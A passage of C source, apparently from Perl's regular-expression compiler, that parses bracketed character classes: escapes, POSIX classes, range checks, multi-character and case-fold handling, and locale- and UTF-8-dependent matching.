case 'e': value = ESC_NATIVE; break;
case 'a': value = '\a'; break;
case 'o':
RExC_parse--; /* function expects to be pointed at the 'o' */
{
const char* error_msg;
bool valid = grok_bslash_o(&RExC_parse,
RExC_end,
&value,
&error_msg,
TO_OUTPUT_WARNINGS(RExC_parse),
strict,
silence_non_portable,
UTF);
if (! valid) {
vFAIL(error_msg);
}
UPDATE_WARNINGS_LOC(RExC_parse - 1);
}
non_portable_endpoint++;
break;
case 'x':
RExC_parse--; /* function expects to be pointed at the 'x' */
{
const char* error_msg;
bool valid = grok_bslash_x(&RExC_parse,
RExC_end,
&value,
&error_msg,
TO_OUTPUT_WARNINGS(RExC_parse),
strict,
silence_non_portable,
UTF);
if (! valid) {
vFAIL(error_msg);
}
UPDATE_WARNINGS_LOC(RExC_parse - 1);
}
non_portable_endpoint++;
break;
case 'c':
value = grok_bslash_c(*RExC_parse, TO_OUTPUT_WARNINGS(RExC_parse));
UPDATE_WARNINGS_LOC(RExC_parse);
RExC_parse++;
non_portable_endpoint++;
break;
case '0': case '1': case '2': case '3': case '4':
case '5': case '6': case '7':
{
/* Take 1-3 octal digits */
I32 flags = PERL_SCAN_SILENT_ILLDIGIT;
numlen = (strict) ? 4 : 3;
value = grok_oct(--RExC_parse, &numlen, &flags, NULL);
RExC_parse += numlen;
if (numlen != 3) {
if (strict) {
RExC_parse += (UTF)
? UTF8_SAFE_SKIP(RExC_parse, RExC_end)
: 1;
vFAIL("Need exactly 3 octal digits");
}
else if ( numlen < 3 /* like \08, \178 */
&& RExC_parse < RExC_end
&& isDIGIT(*RExC_parse)
&& ckWARN(WARN_REGEXP))
{
reg_warn_non_literal_string(
RExC_parse + 1,
form_short_octal_warning(RExC_parse, numlen));
}
}
non_portable_endpoint++;
break;
}
default:
/* Allow \_ to not give an error */
if (isWORDCHAR(value) && value != '_') {
if (strict) {
vFAIL2("Unrecognized escape \\%c in character class",
(int)value);
}
else {
ckWARN2reg(RExC_parse,
"Unrecognized escape \\%c in character class passed through",
(int)value);
}
}
break;
} /* End of switch on char following backslash */
} /* end of handling backslash escape sequences */
/* Here, we have the current token in 'value' */
if (namedclass > OOB_NAMEDCLASS) { /* this is a named class \blah */
U8 classnum;
/* a bad range like a-\d, a-[:digit:]. The '-' is taken as a
* literal, as is the character that began the false range, i.e.
* the 'a' in the examples */
if (range) {
const int w = (RExC_parse >= rangebegin)
? RExC_parse - rangebegin
: 0;
if (strict) {
vFAIL2utf8f(
"False [] range \"%" UTF8f "\"",
UTF8fARG(UTF, w, rangebegin));
}
else {
ckWARN2reg(RExC_parse,
"False [] range \"%" UTF8f "\"",
UTF8fARG(UTF, w, rangebegin));
cp_list = add_cp_to_invlist(cp_list, '-');
cp_foldable_list = add_cp_to_invlist(cp_foldable_list,
prevvalue);
}
range = 0; /* this was not a true range */
element_count += 2; /* So counts for three values */
}
classnum = namedclass_to_classnum(namedclass);
if (LOC && namedclass < ANYOF_POSIXL_MAX
#ifndef HAS_ISASCII
&& classnum != _CC_ASCII
#endif
) {
SV* scratch_list = NULL;
/* What the Posix classes (like \w, [:space:]) match isn't
* generally knowable under locale until actual match time. A
* special node is used for these which has extra space for a
* bitmap, with a bit reserved for each named class that is to
* be matched against. (This isn't needed for \p{} and
* pseudo-classes, as they are not affected by locale, and
* hence are dealt with separately.) However, if a named class
* and its complement are both present, then it matches
* everything, and there is no runtime dependency. Odd numbers
* are the complements of the next lower number, so xor works.
* (Note that something like [\w\D] should match everything,
* because \d should be a proper subset of \w. But rather than
* trust that the locale is well behaved, we leave this to
* runtime to sort out) */
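            /* As a concrete illustration of the xor trick (just restating the
             * numbering, not adding new rules): the complement classes have
             * the odd numbers, each one greater than the class it
             * complements, so ANYOF_NDIGIT ^ 1 is ANYOF_DIGIT and vice
             * versa; the test below therefore asks whether the complementary
             * class has already been recorded in 'posixl' */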
if (POSIXL_TEST(posixl, namedclass ^ 1)) {
cp_list = _add_range_to_invlist(cp_list, 0, UV_MAX);
POSIXL_ZERO(posixl);
has_runtime_dependency &= ~HAS_L_RUNTIME_DEPENDENCY;
anyof_flags &= ~ANYOF_MATCHES_POSIXL;
continue; /* We could ignore the rest of the class, but
best to parse it for any errors */
}
else { /* Here, isn't the complement of any already parsed
class */
POSIXL_SET(posixl, namedclass);
has_runtime_dependency |= HAS_L_RUNTIME_DEPENDENCY;
anyof_flags |= ANYOF_MATCHES_POSIXL;
/* The above-Latin1 characters are not subject to locale
* rules. Just add them to the unconditionally-matched
* list */
/* Get the list of the above-Latin1 code points this
* matches */
_invlist_intersection_maybe_complement_2nd(PL_AboveLatin1,
PL_XPosix_ptrs[classnum],
/* Odd numbers are complements,
* like NDIGIT, NASCII, ... */
namedclass % 2 != 0,
&scratch_list);
/* Checking if 'cp_list' is NULL first saves an extra
* clone. Its reference count will be decremented at the
* next union, etc, or if this is the only instance, at the
* end of the routine */
if (! cp_list) {
cp_list = scratch_list;
}
else {
_invlist_union(cp_list, scratch_list, &cp_list);
SvREFCNT_dec_NN(scratch_list);
}
continue; /* Go get next character */
}
}
else {
/* Here, is not /l, or is a POSIX class for which /l doesn't
* matter (or is a Unicode property, which is skipped here). */
if (namedclass >= ANYOF_POSIXL_MAX) { /* If a special class */
if (namedclass != ANYOF_UNIPROP) { /* UNIPROP = \p and \P */
/* Here, should be \h, \H, \v, or \V. None of /d, /i
* nor /l make a difference in what these match,
* therefore we just add what they match to cp_list. */
if (classnum != _CC_VERTSPACE) {
assert( namedclass == ANYOF_HORIZWS
|| namedclass == ANYOF_NHORIZWS);
/* It turns out that \h is just a synonym for
* XPosixBlank */
classnum = _CC_BLANK;
}
_invlist_union_maybe_complement_2nd(
cp_list,
PL_XPosix_ptrs[classnum],
namedclass % 2 != 0, /* Complement if odd
(NHORIZWS, NVERTWS)
*/
&cp_list);
}
}
else if ( AT_LEAST_UNI_SEMANTICS
|| classnum == _CC_ASCII
|| (DEPENDS_SEMANTICS && ( classnum == _CC_DIGIT
|| classnum == _CC_XDIGIT)))
{
/* We usually have to worry about /d affecting what POSIX
* classes match, with special code needed because we won't
* know until runtime what all matches. But there is no
* extra work needed under /u and /a; and [:ascii:] is
* unaffected by /d; and :digit: and :xdigit: don't have
* runtime differences under /d. So we can special case
* these, and avoid some extra work below, and at runtime.
* */
_invlist_union_maybe_complement_2nd(
simple_posixes,
((AT_LEAST_ASCII_RESTRICTED)
? PL_Posix_ptrs[classnum]
: PL_XPosix_ptrs[classnum]),
namedclass % 2 != 0,
&simple_posixes);
}
else { /* Garden variety class. If is NUPPER, NALPHA, ...
complement and use nposixes */
SV** posixes_ptr = namedclass % 2 == 0
? &posixes
: &nposixes;
_invlist_union_maybe_complement_2nd(
*posixes_ptr,
PL_XPosix_ptrs[classnum],
namedclass % 2 != 0,
posixes_ptr);
}
}
} /* end of namedclass \blah */
SKIP_BRACKETED_WHITE_SPACE(skip_white, RExC_parse);
/* If 'range' is set, 'value' is the ending of a range--check its
* validity. (If value isn't a single code point in the case of a
* range, we should have figured that out above in the code that
* catches false ranges). Later, we will handle each individual code
* point in the range. If 'range' isn't set, this could be the
* beginning of a range, so check for that by looking ahead to see if
* the next real character to be processed is the range indicator--the
* minus sign */
if (range) {
#ifdef EBCDIC
/* For unicode ranges, we have to test that the Unicode as opposed
* to the native values are not decreasing. (Above 255, there is
* no difference between native and Unicode) */
if (unicode_range && prevvalue < 255 && value < 255) {
if (NATIVE_TO_LATIN1(prevvalue) > NATIVE_TO_LATIN1(value)) {
goto backwards_range;
}
}
else
#endif
if (prevvalue > value) /* b-a */ {
int w;
#ifdef EBCDIC
backwards_range:
#endif
w = RExC_parse - rangebegin;
vFAIL2utf8f(
"Invalid [] range \"%" UTF8f "\"",
UTF8fARG(UTF, w, rangebegin));
NOT_REACHED; /* NOTREACHED */
}
}
else {
prevvalue = value; /* save the beginning of the potential range */
if (! stop_at_1 /* Can't be a range if parsing just one thing */
&& *RExC_parse == '-')
{
char* next_char_ptr = RExC_parse + 1;
/* Get the next real char after the '-' */
SKIP_BRACKETED_WHITE_SPACE(skip_white, next_char_ptr);
                /* If the '-' is at the end of the class (just before the ']'),
* it is a literal minus; otherwise it is a range */
if (next_char_ptr < RExC_end && *next_char_ptr != ']') {
RExC_parse = next_char_ptr;
/* a bad range like \w-, [:word:]- ? */
if (namedclass > OOB_NAMEDCLASS) {
if (strict || ckWARN(WARN_REGEXP)) {
const int w = RExC_parse >= rangebegin
? RExC_parse - rangebegin
: 0;
if (strict) {
vFAIL4("False [] range \"%*.*s\"",
w, w, rangebegin);
}
else {
vWARN4(RExC_parse,
"False [] range \"%*.*s\"",
w, w, rangebegin);
}
}
cp_list = add_cp_to_invlist(cp_list, '-');
element_count++;
} else
range = 1; /* yeah, it's a range! */
continue; /* but do it the next time */
}
}
}
if (namedclass > OOB_NAMEDCLASS) {
continue;
}
/* Here, we have a single value this time through the loop, and
* <prevvalue> is the beginning of the range, if any; or <value> if
* not. */
/* non-Latin1 code point implies unicode semantics. */
if (value > 255) {
REQUIRE_UNI_RULES(flagp, 0);
}
/* Ready to process either the single value, or the completed range.
* For single-valued non-inverted ranges, we consider the possibility
* of multi-char folds. (We made a conscious decision to not do this
* for the other cases because it can often lead to non-intuitive
* results. For example, you have the peculiar case that:
* "s s" =~ /^[^\xDF]+$/i => Y
* "ss" =~ /^[^\xDF]+$/i => N
*
* See [perl #89750] */
if (FOLD && allow_mutiple_chars && value == prevvalue) {
if ( value == LATIN_SMALL_LETTER_SHARP_S
|| (value > 255 && _invlist_contains_cp(PL_HasMultiCharFold,
value)))
{
/* Here <value> is indeed a multi-char fold. Get what it is */
U8 foldbuf[UTF8_MAXBYTES_CASE+1];
STRLEN foldlen;
UV folded = _to_uni_fold_flags(
value,
foldbuf,
&foldlen,
FOLD_FLAGS_FULL | (ASCII_FOLD_RESTRICTED
? FOLD_FLAGS_NOMIX_ASCII
: 0)
);
/* Here, <folded> should be the first character of the
* multi-char fold of <value>, with <foldbuf> containing the
* whole thing. But, if this fold is not allowed (because of
* the flags), <fold> will be the same as <value>, and should
* be processed like any other character, so skip the special
* handling */
if (folded != value) {
/* Skip if we are recursed, currently parsing the class
* again. Otherwise add this character to the list of
* multi-char folds. */
if (! RExC_in_multi_char_class) {
STRLEN cp_count = utf8_length(foldbuf,
foldbuf + foldlen);
SV* multi_fold = sv_2mortal(newSVpvs(""));
Perl_sv_catpvf(aTHX_ multi_fold, "\\x{%" UVXf "}", value);
multi_char_matches
= add_multi_match(multi_char_matches,
multi_fold,
cp_count);
}
/* This element should not be processed further in this
* class */
element_count--;
value = save_value;
prevvalue = save_prevvalue;
continue;
}
}
}
if (strict || ckWARN(WARN_REGEXP)) {
if (range) {
/* If the range starts above 255, everything is portable and
* likely to be so for any foreseeable character set, so don't
* warn. */
if (unicode_range && non_portable_endpoint && prevvalue < 256) {
vWARN(RExC_parse, "Both or neither range ends should be Unicode");
}
else if (prevvalue != value) {
/* Under strict, ranges that start and/or end in an ASCII
* printable should have each end point be a portable value
* for it (preferably like 'A', but we don't warn if it is
* a (portable) Unicode name or code point), and the range
* must be all digits or all letters of the same case.
* Otherwise, the range is non-portable and unclear as to
* what it contains */
if ( (isPRINT_A(prevvalue) || isPRINT_A(value))
&& ( non_portable_endpoint
|| ! ( (isDIGIT_A(prevvalue) && isDIGIT_A(value))
|| (isLOWER_A(prevvalue) && isLOWER_A(value))
|| (isUPPER_A(prevvalue) && isUPPER_A(value))
))) {
vWARN(RExC_parse, "Ranges of ASCII printables should"
" be some subset of \"0-9\","
" \"A-Z\", or \"a-z\"");
}
else if (prevvalue >= FIRST_NON_ASCII_DECIMAL_DIGIT) {
SSize_t index_start;
SSize_t index_final;
/* But the nature of Unicode and languages mean we
* can't do the same checks for above-ASCII ranges,
* except in the case of digit ones. These should
* contain only digits from the same group of 10. The
* ASCII case is handled just above. Hence here, the
* range could be a range of digits. First some
* unlikely special cases. Grandfather in that a range
* ending in 19DA (NEW TAI LUE THAM DIGIT ONE) is bad
* if its starting value is one of the 10 digits prior
* to it. This is because it is an alternate way of
* writing 19D1, and some people may expect it to be in
* that group. But it is bad, because it won't give
* the expected results. In Unicode 5.2 it was
* considered to be in that group (of 11, hence), but
* this was fixed in the next version */
if (UNLIKELY(value == 0x19DA && prevvalue >= 0x19D0)) {
goto warn_bad_digit_range;
}
else if (UNLIKELY( prevvalue >= 0x1D7CE
&& value <= 0x1D7FF))
{
/* This is the only other case currently in Unicode
* where the algorithm below fails. The code
* points just above are the end points of a single
* range containing only decimal digits. It is 5
* different series of 0-9. All other ranges of
* digits currently in Unicode are just a single
* series. (And mktables will notify us if a later
* Unicode version breaks this.)
*
* If the range being checked is at most 9 long,
* and the digit values represented are in
* numerical order, they are from the same series.
* */
if ( value - prevvalue > 9
|| ((( value - 0x1D7CE) % 10)
<= (prevvalue - 0x1D7CE) % 10))
{
goto warn_bad_digit_range;
}
}
else {
/* For all other ranges of digits in Unicode, the
* algorithm is just to check if both end points
* are in the same series, which is the same range.
* */
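/* (For instance, the ten Devanagari digits U+0966..U+096F form one
* such series; a range lying entirely within them passes this check,
* while one running from a Devanagari digit into the Bengali digits
* (U+09E6..U+09EF) triggers the warning below.) */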
index_start = _invlist_search(
PL_XPosix_ptrs[_CC_DIGIT],
prevvalue);
/* Warn if the range starts and ends with a digit,
* and they are not in the same group of 10. */
if ( index_start >= 0
&& ELEMENT_RANGE_MATCHES_INVLIST(index_start)
&& (index_final =
_invlist_search(PL_XPosix_ptrs[_CC_DIGIT],
value)) != index_start
&& index_final >= 0
&& ELEMENT_RANGE_MATCHES_INVLIST(index_final))
{
warn_bad_digit_range:
vWARN(RExC_parse, "Ranges of digits should be"
" from the same group of"
" 10");
}
}
}
}
}
if ((! range || prevvalue == value) && non_portable_endpoint) {
if (isPRINT_A(value)) {
char literal[3];
unsigned d = 0;
if (isBACKSLASHED_PUNCT(value)) {
literal[d++] = '\\';
}
literal[d++] = (char) value;
literal[d++] = '\0';
vWARN4(RExC_parse,
"\"%.*s\" is more clearly written simply as \"%s\"",
(int) (RExC_parse - rangebegin),
rangebegin,
literal
);
}
else if (isMNEMONIC_CNTRL(value)) {
vWARN4(RExC_parse,
"\"%.*s\" is more clearly written simply as \"%s\"",
(int) (RExC_parse - rangebegin),
rangebegin,
cntrl_to_mnemonic((U8) value)
);
}
}
}
/* Deal with this element of the class */
#ifndef EBCDIC
cp_foldable_list = _add_range_to_invlist(cp_foldable_list,
prevvalue, value);
#else
/* On non-ASCII platforms, for ranges that span all of 0..255, and ones
* that don't require special handling, we can just add the range like
* we do for ASCII platforms */
if ((UNLIKELY(prevvalue == 0) && value >= 255)
|| ! (prevvalue < 256
&& (unicode_range
|| (! non_portable_endpoint
&& ((isLOWER_A(prevvalue) && isLOWER_A(value))
|| (isUPPER_A(prevvalue)
&& isUPPER_A(value)))))))
{
cp_foldable_list = _add_range_to_invlist(cp_foldable_list,
prevvalue, value);
}
else {
/* Here, requires special handling. This can be because it is a
* range whose code points are considered to be Unicode, and so
* must be individually translated into native, or because it's a
* subrange of 'A-Z' or 'a-z' which each aren't contiguous in
* EBCDIC, but we have defined them to include only the "expected"
* upper or lower case ASCII alphabetics. Subranges above 255 are
* the same in native and Unicode, so can be added as a range */
U8 start = NATIVE_TO_LATIN1(prevvalue);
unsigned j;
U8 end = (value < 256) ? NATIVE_TO_LATIN1(value) : 255;
for (j = start; j <= end; j++) {
cp_foldable_list = add_cp_to_invlist(cp_foldable_list, LATIN1_TO_NATIVE(j));
}
if (value > 255) {
cp_foldable_list = _add_range_to_invlist(cp_foldable_list,
256, value);
}
}
#endif
range = 0; /* this range (if it was one) is done now */
} /* End of loop through all the text within the brackets */
if ( posix_warnings && av_tindex_skip_len_mg(posix_warnings) >= 0) {
output_posix_warnings(pRExC_state, posix_warnings);
}
/* If anything in the class expands to more than one character, we have to
* deal with them by building up a substitute parse string, and recursively
* calling reg() on it, instead of proceeding */
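/* (A concrete case: a class containing LATIN SMALL LETTER SHARP S under
* /i can match the two-character sequence "ss"; a single ANYOF node can
* only match one character, so the class is rewritten as an alternation
* and re-parsed.) */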
if (multi_char_matches) {
SV * substitute_parse = newSVpvn_flags("?:", 2, SVs_TEMP);
I32 cp_count;
STRLEN len;
char *save_end = RExC_end;
char *save_parse = RExC_parse;
char *save_start = RExC_start;
Size_t constructed_prefix_len = 0; /* This gives the length of the
constructed portion of the
substitute parse. */
bool first_time = TRUE; /* First multi-char occurrence doesn't get
a "|" */
I32 reg_flags;
assert(! invert);
/* Only one level of recursion allowed */
assert(RExC_copy_start_in_constructed == RExC_precomp);
#if 0 /* Have decided not to deal with multi-char folds in inverted classes,
because too confusing */
if (invert) {
sv_catpvs(substitute_parse, "(?:");
}
#endif
/* Look at the longest folds first */
for (cp_count = av_tindex_skip_len_mg(multi_char_matches);
cp_count > 0;
cp_count--)
{
if (av_exists(multi_char_matches, cp_count)) {
AV** this_array_ptr;
SV* this_sequence;
this_array_ptr = (AV**) av_fetch(multi_char_matches,
cp_count, FALSE);
while ((this_sequence = av_pop(*this_array_ptr)) !=
&PL_sv_undef)
{
if (! first_time) {
sv_catpvs(substitute_parse, "|");
}
first_time = FALSE;
sv_catpv(substitute_parse, SvPVX(this_sequence));
}
}
}
/* If the character class contains anything else besides these
* multi-character folds, have to include it in recursive parsing */
if (element_count) {
sv_catpvs(substitute_parse, "|[");
constructed_prefix_len = SvCUR(substitute_parse);
sv_catpvn(substitute_parse, orig_parse, RExC_parse - orig_parse);
/* Put in a closing ']' only if not going off the end, as otherwise
* we are adding something that really isn't there */
if (RExC_parse < RExC_end) {
sv_catpvs(substitute_parse, "]");
}
}
sv_catpvs(substitute_parse, ")");
#if 0
if (invert) {
/* This is a way to get the parse to skip forward a whole named
* sequence instead of matching the 2nd character when it fails the
* first */
sv_catpvs(substitute_parse, "(*THEN)(*SKIP)(*FAIL)|.)");
}
#endif
/* Set up the data structure so that any errors will be properly
* reported. See the comments at the definition of
* REPORT_LOCATION_ARGS for details */
RExC_copy_start_in_input = (char *) orig_parse;
RExC_start = RExC_parse = SvPV(substitute_parse, len);
RExC_copy_start_in_constructed = RExC_start + constructed_prefix_len;
RExC_end = RExC_parse + len;
RExC_in_multi_char_class = 1;
ret = reg(pRExC_state, 1, &reg_flags, depth+1);
*flagp |= reg_flags & (HASWIDTH|SIMPLE|SPSTART|POSTPONED|RESTART_PARSE|NEED_UTF8);
/* And restore so can parse the rest of the pattern */
RExC_parse = save_parse;
RExC_start = RExC_copy_start_in_constructed = RExC_copy_start_in_input = save_start;
RExC_end = save_end;
RExC_in_multi_char_class = 0;
SvREFCNT_dec_NN(multi_char_matches);
return ret;
}
/* If folding, we calculate all characters that could fold to or from the
* ones already on the list */
if (cp_foldable_list) {
if (FOLD) {
UV start, end; /* End points of code point ranges */
SV* fold_intersection = NULL;
SV** use_list;
/* Our calculated list will be for Unicode rules. For locale
* matching, we have to keep a separate list that is consulted at
* runtime only when the locale indicates Unicode rules (and we
* don't include potential matches in the ASCII/Latin1 range, as
* any code point could fold to any other, based on the run-time
* locale). For non-locale, we just use the general list */
if (LOC) {
use_list = &only_utf8_locale_list;
}
else {
use_list = &cp_list;
}
/* Only the characters in this class that participate in folds need
* be checked. Get the intersection of this class and all the
* possible characters that are foldable. This can quickly narrow
* down a large class */
_invlist_intersection(PL_in_some_fold, cp_foldable_list,
&fold_intersection);
/* Now look at the foldable characters in this class individually */
invlist_iterinit(fold_intersection);
while (invlist_iternext(fold_intersection, &start, &end)) {
UV j;
UV folded;
/* Look at every character in the range */
for (j = start; j <= end; j++) {
U8 foldbuf[UTF8_MAXBYTES_CASE+1];
STRLEN foldlen;
unsigned int k;
Size_t folds_count;
unsigned int first_fold;
const unsigned int * remaining_folds;
if (j < 256) {
/* Under /l, we don't know what code points below 256
* fold to, except we do know the MICRO SIGN folds to
* an above-255 character if the locale is UTF-8, so we
* add it to the special list (in *use_list). Otherwise
* we know now what things can match, though some folds
* are valid under /d only if the target is UTF-8.
* Those go in a separate list */
if ( IS_IN_SOME_FOLD_L1(j)
&& ! (LOC && j != MICRO_SIGN))
{
/* ASCII is always matched; non-ASCII is matched
* only under Unicode rules (which could happen
* under /l if the locale is a UTF-8 one) */
if (isASCII(j) || ! DEPENDS_SEMANTICS) {
*use_list = add_cp_to_invlist(*use_list,
PL_fold_latin1[j]);
}
else if (j != PL_fold_latin1[j]) {
upper_latin1_only_utf8_matches
= add_cp_to_invlist(
upper_latin1_only_utf8_matches,
PL_fold_latin1[j]);
}
}
if (HAS_NONLATIN1_SIMPLE_FOLD_CLOSURE(j)
&& (! isASCII(j) || ! ASCII_FOLD_RESTRICTED))
{
add_above_Latin1_folds(pRExC_state,
(U8) j,
use_list);
}
continue;
}
/* Here is an above Latin1 character. We don't have the
* rules hard-coded for it. First, get its fold. This is
* the simple fold, as the multi-character folds have been
* handled earlier and separated out */
folded = _to_uni_fold_flags(j, foldbuf, &foldlen,
(ASCII_FOLD_RESTRICTED)
? FOLD_FLAGS_NOMIX_ASCII
: 0);
/* Single character fold of above Latin1. Add everything
* in its fold closure to the list that this node should
* match. */
folds_count = _inverse_folds(folded, &first_fold,
&remaining_folds);
for (k = 0; k <= folds_count; k++) {
UV c = (k == 0) /* First time through use itself */
? folded
: (k == 1) /* 2nd time use, the first fold */
? first_fold
/* Then the remaining ones */
: remaining_folds[k-2];
/* /aa doesn't allow folds between ASCII and non- */
if (( ASCII_FOLD_RESTRICTED
&& (isASCII(c) != isASCII(j))))
{
continue;
}
/* Folds under /l which cross the 255/256 boundary are
* added to a separate list. (These are valid only
* when the locale is UTF-8.) */
if (c < 256 && LOC) {
*use_list = add_cp_to_invlist(*use_list, c);
continue;
}
if (isASCII(c) || c > 255 || AT_LEAST_UNI_SEMANTICS)
{
cp_list = add_cp_to_invlist(cp_list, c);
}
else {
/* Similarly folds involving non-ascii Latin1
* characters under /d are added to their list */
upper_latin1_only_utf8_matches
= add_cp_to_invlist(
upper_latin1_only_utf8_matches,
c);
}
}
}
}
SvREFCNT_dec_NN(fold_intersection);
}
/* Now that we have finished adding all the folds, there is no reason
* to keep the foldable list separate */
_invlist_union(cp_list, cp_foldable_list, &cp_list);
SvREFCNT_dec_NN(cp_foldable_list);
}
/* And combine the result (if any) with any inversion lists from posix
* classes. The lists are kept separate up to now because we don't want to
* fold the classes */
if (simple_posixes) { /* These are the classes known to be unaffected by
/a, /aa, and /d */
if (cp_list) {
_invlist_union(cp_list, simple_posixes, &cp_list);
SvREFCNT_dec_NN(simple_posixes);
}
else {
cp_list = simple_posixes;
}
}
if (posixes || nposixes) {
if (! DEPENDS_SEMANTICS) {
/* For everything but /d, we can just add the current 'posixes' and
* 'nposixes' to the main list */
if (posixes) {
if (cp_list) {
_invlist_union(cp_list, posixes, &cp_list);
SvREFCNT_dec_NN(posixes);
}
else {
cp_list = posixes;
}
}
if (nposixes) {
if (cp_list) {
_invlist_union(cp_list, nposixes, &cp_list);
SvREFCNT_dec_NN(nposixes);
}
else {
cp_list = nposixes;
}
}
}
else {
/* Under /d, things like \w match upper Latin1 characters only if
* the target string is in UTF-8. But things like \W match all the
* upper Latin1 characters if the target string is not in UTF-8.
*
* Handle the case with something like \W separately */
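/* (Concretely: under /d, U+00C0 is matched by \w only when the target
* string is in UTF-8, but is matched by \W whenever the target is not
* in UTF-8.) */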
if (nposixes) {
SV* only_non_utf8_list = invlist_clone(PL_UpperLatin1, NULL);
/* A complemented posix class matches all upper Latin1
* characters if not in UTF-8. And it matches just certain
* ones when in UTF-8. That means those certain ones are
* matched regardless, so can just be added to the
* unconditional list */
if (cp_list) {
_invlist_union(cp_list, nposixes, &cp_list);
SvREFCNT_dec_NN(nposixes);
nposixes = NULL;
}
else {
cp_list = nposixes;
}
/* Likewise for 'posixes' */
_invlist_union(posixes, cp_list, &cp_list);
SvREFCNT_dec(posixes);
/* Likewise for anything else in the range that matched only
* under UTF-8 */
if (upper_latin1_only_utf8_matches) {
_invlist_union(cp_list,
upper_latin1_only_utf8_matches,
&cp_list);
SvREFCNT_dec_NN(upper_latin1_only_utf8_matches);
upper_latin1_only_utf8_matches = NULL;
}
/* If we don't match all the upper Latin1 characters regardless
* of UTF-8ness, we have to set a flag to match the rest when
* not in UTF-8 */
_invlist_subtract(only_non_utf8_list, cp_list,
&only_non_utf8_list);
if (_invlist_len(only_non_utf8_list) != 0) {
anyof_flags |= ANYOF_SHARED_d_MATCHES_ALL_NON_UTF8_NON_ASCII_non_d_WARN_SUPER;
}
SvREFCNT_dec_NN(only_non_utf8_list);
}
else {
/* Here there were no complemented posix classes. That means
* the upper Latin1 characters in 'posixes' match only when the
* target string is in UTF-8. So we have to add them to the
* list of those types of code points, while adding the
* remainder to the unconditional list.
*
* First calculate what they are */
SV* nonascii_but_latin1_properties = NULL;
_invlist_intersection(posixes, PL_UpperLatin1,
&nonascii_but_latin1_properties);
/* And add them to the final list of such characters. */
_invlist_union(upper_latin1_only_utf8_matches,
nonascii_but_latin1_properties,
&upper_latin1_only_utf8_matches);
/* Remove them from what now becomes the unconditional list */
_invlist_subtract(posixes, nonascii_but_latin1_properties,
&posixes);
/* And add those unconditional ones to the final list */
if (cp_list) {
_invlist_union(cp_list, posixes, &cp_list);
SvREFCNT_dec_NN(posixes);
posixes = NULL;
}
else {
cp_list = posixes;
}
SvREFCNT_dec(nonascii_but_latin1_properties);
/* Get rid of any characters from the conditional list that we
* now know are matched unconditionally, which may make that
* list empty */
_invlist_subtract(upper_latin1_only_utf8_matches,
cp_list,
&upper_latin1_only_utf8_matches);
if (_invlist_len(upper_latin1_only_utf8_matches) == 0) {
SvREFCNT_dec_NN(upper_latin1_only_utf8_matches);
upper_latin1_only_utf8_matches = NULL;
}
}
}
}
/* And combine the result (if any) with any inversion list from properties.
* The lists are kept separate up to now so that we can distinguish the two
* in regards to matching above-Unicode. A run-time warning is generated
* if a Unicode property is matched against a non-Unicode code point. But,
* we allow user-defined properties to match anything, without any warning,
* and we also suppress the warning if there is a portion of the character
* class that isn't a Unicode property, and which matches above Unicode, \W
* or [\x{110000}] for example.
* (Note that in this case, unlike the Posix one above, there is no
* <upper_latin1_only_utf8_matches>, because having a Unicode property
* forces Unicode semantics) */
if (properties) {
if (cp_list) {
/* If it matters to the final outcome, see if a non-property
* component of the class matches above Unicode. If so, the
* warning gets suppressed. This is true even if just a single
* such code point is specified, as, though not strictly correct if
* another such code point is matched against, the fact that they
* are using above-Unicode code points indicates they should know
* the issues involved */
if (warn_super) {
warn_super = ! (invert
^ (invlist_highest(cp_list) > PERL_UNICODE_MAX));
}
_invlist_union(properties, cp_list, &cp_list);
SvREFCNT_dec_NN(properties);
}
else {
cp_list = properties;
}
if (warn_super) {
anyof_flags
|= ANYOF_SHARED_d_MATCHES_ALL_NON_UTF8_NON_ASCII_non_d_WARN_SUPER;
/* Because an ANYOF node is the only one that warns, this node
* can't be optimized into something else */
optimizable = FALSE;
}
}
/* Here, we have calculated what code points should be in the character
* class.
*
* Now we can see about various optimizations. Fold calculation (which we
* did above) needs to take place before inversion. Otherwise /[^k]/i
* would invert to include K, which under /i would match k, which it
* shouldn't. Therefore we can't invert folded locale now, as it won't be
* folded until runtime */
/* If we didn't do folding, it's because some information isn't available
* until runtime; set the run-time fold flag for these. We know to set the
* flag if we have a non-NULL list for UTF-8 locales, or the class matches
* at least one 0-255 range code point */
if (LOC && FOLD) {
/* Some things on the list might be unconditionally included because of
* other components. Remove them, and clean up the list if it goes to
* 0 elements */
if (only_utf8_locale_list && cp_list) {
_invlist_subtract(only_utf8_locale_list, cp_list,
&only_utf8_locale_list);
if (_invlist_len(only_utf8_locale_list) == 0) {
SvREFCNT_dec_NN(only_utf8_locale_list);
only_utf8_locale_list = NULL;
}
}
if ( only_utf8_locale_list
|| (cp_list && ( _invlist_contains_cp(cp_list, LATIN_CAPITAL_LETTER_I_WITH_DOT_ABOVE)
|| _invlist_contains_cp(cp_list, LATIN_SMALL_LETTER_DOTLESS_I))))
{
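/* These two code points (U+0130 and U+0131) are the Turkic dotted
* capital I and dotless small i; their case folds involve ASCII 'i'/'I',
* but only under a UTF-8 (Turkic) locale, hence both the run-time
* dependency and the fold flags. */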
has_runtime_dependency |= HAS_L_RUNTIME_DEPENDENCY;
anyof_flags
|= ANYOFL_FOLD
| ANYOFL_SHARED_UTF8_LOCALE_fold_HAS_MATCHES_nonfold_REQD;
}
else if (cp_list) { /* Look to see if a 0-255 code point is in list */
UV start, end;
invlist_iterinit(cp_list);
if (invlist_iternext(cp_list, &start, &end) && start < 256) {
anyof_flags |= ANYOFL_FOLD;
has_runtime_dependency |= HAS_L_RUNTIME_DEPENDENCY;
}
invlist_iterfinish(cp_list);
}
}
else if ( DEPENDS_SEMANTICS
&& ( upper_latin1_only_utf8_matches
|| (anyof_flags & ANYOF_SHARED_d_MATCHES_ALL_NON_UTF8_NON_ASCII_non_d_WARN_SUPER)))
{
RExC_seen_d_op = TRUE;
has_runtime_dependency |= HAS_D_RUNTIME_DEPENDENCY;
}
/* Optimize inverted patterns (e.g. [^a-z]) when everything is known at
* compile time. */
if ( cp_list
&& invert
&& ! has_runtime_dependency)
{
_invlist_invert(cp_list);
/* Clear the invert flag since have just done it here */
invert = FALSE;
}
if (ret_invlist) {
*ret_invlist = cp_list;
return RExC_emit;
}
/* All possible optimizations below still have these characteristics.
* (Multi-char folds aren't SIMPLE, but they don't get this far in this
* routine) */
*flagp |= HASWIDTH|SIMPLE;
if (anyof_flags & ANYOF_LOCALE_FLAGS) {
RExC_contains_locale = 1;
}
/* Some character classes are equivalent to other nodes. Such nodes take
* up less room, and some nodes require fewer operations to execute, than
* ANYOF nodes. EXACTish nodes may be joinable with adjacent nodes to
* improve efficiency. */
if (optimizable) {
